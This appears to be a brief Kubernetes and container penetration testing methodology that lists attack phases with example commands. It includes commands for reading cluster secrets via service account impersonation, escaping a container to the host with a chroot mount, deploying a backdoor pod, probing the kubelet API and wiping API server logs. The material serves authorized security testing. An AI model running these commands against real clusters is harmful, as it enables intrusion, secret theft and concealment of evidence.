Container Testing Methodology
Kubernetes/Container Penetration Testing Methodology
1. Reconnaissance
Gather information about the target environment
Identify exposed services and endpoints
Commands:
# Scan for open ports
nmap -sV -p- <target_ip>
# Identify Kubernetes API server
curl -k https://<api_server_ip>:6443/version
# Enumerate subdomains
subfinder -d <domain>2. Initial Access
Exploit exposed services
Gain a foothold in the cluster
Commands:
# Test for unauthenticated access to API server
kubectl --insecure-skip-tls-verify -s https://<api_server_ip>:6443 get pods
# Exploit known vulnerabilities (e.g., CVE-2018-1002105)
./cve-2018-1002105.sh https://<api_server_ip>:64433. Privilege Escalation
Escalate privileges within the cluster
Move laterally between pods/nodes
Commands:
# List service accounts and their permissions
kubectl get serviceaccounts
kubectl get clusterrolebindings
# Exploit overly permissive RBAC rules
kubectl --as=system:serviceaccount:default:default get secrets
# Escape container to host
docker run -v /:/host -it ubuntu chroot /host4. Post-Exploitation
Access sensitive data
Maintain persistence
Pivot to other parts of the infrastructure
Commands:
# Access secrets
kubectl get secrets -o yaml
# Create backdoor pod
kubectl apply -f malicious-pod.yaml
# Exploit kubelet API for node access
curl -k https://<node_ip>:10250/pods5. Covering Tracks
Remove evidence of intrusion
Clean up temporary files and logs
Commands:
# Delete pods
kubectl delete pod <compromised_pod>
# Clear logs
echo > /var/log/kubernetes/kube-apiserver.log6. Reporting
Document findings
Provide remediation recommendations
Key Areas to Address:
Misconfigurations
Vulnerabilities in images or components
Overly permissive RBAC rules
Insecure network policies
Lack of encryption or proper authentication
Remember to always get proper authorization before performing any penetration testing activities.
Last updated